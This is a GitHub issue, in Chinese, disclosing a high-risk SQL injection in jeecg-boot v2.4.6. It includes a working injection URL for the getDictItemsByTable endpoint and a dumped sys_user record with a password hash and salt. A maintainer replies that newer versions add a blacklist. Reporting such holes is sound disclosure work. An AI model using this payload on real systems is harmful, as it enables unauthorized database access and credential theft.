### ISSUE TITLE
v2.4.6 SQL注入 漏洞

### ISSUE THREAD

**Issue by kunmeng** [jeecgboot/jeecg-boot#5150]
##### 版本号：
v2.4.6

##### 前端版本：vue3版？还是 vue2版？
vue2

##### 问题描述：
漏洞类型	SQL注入
风险等级	高危
http://XXX/sys/ng-alain/getDictItemsByTable/'%20from%20sys_user/*,%20'/x.js
获取表名sys_user 得结果
[{"birthday":null,"third_id":null,"work_no":"00002","rel_tenant_ids":"","create_by":"admin","password":"3adaa52587187739dfe081384ab732f4","update_time":"2020-08-27 09:27:28","post":"devleader","user_identity":1,"id":"a75d45a015c44384a04449ee80dc3503","update_by":"admin","email":null,"third_type":null,"del_flag":0,"salt":"ecRjjtQ8","create_time":"2019-02-13 16:02:36","as \"label\",x":{"js as \"value\" from ":" as \"label\",x.js as \"value\" from "},"sex":1,"telephone":null,"depart_ids":"","avatar":"temp/weather_low.fw_1598491646997.fw.png","realname":"sysadmin","activiti_sync":1,"phone":null,"org_code":"A01A05","username":"sysadmin","status":1}]

##### 截图&代码：
![image](https://github.com/jeecgboot/jeecg-boot/assets/9875584/cb61b0ca-1108-447d-bcf1-caf1dfca92c0)

#### 友情提示（为了提高issue处理效率）：
  - 未按格式要求发帖，会被直接删掉;
  - 描述过于简单或模糊，导致无法处理的，会被直接删掉；
  - 请自己初判问题描述是否清楚，是否方便我们调查处理；
  - 针对问题请说明是Online在线功能(需说明用的主题模板)，还是生成的代码功能；

**Comment by zhangdaiscott** [comment]
参考最新版，已经加了黑名单限制
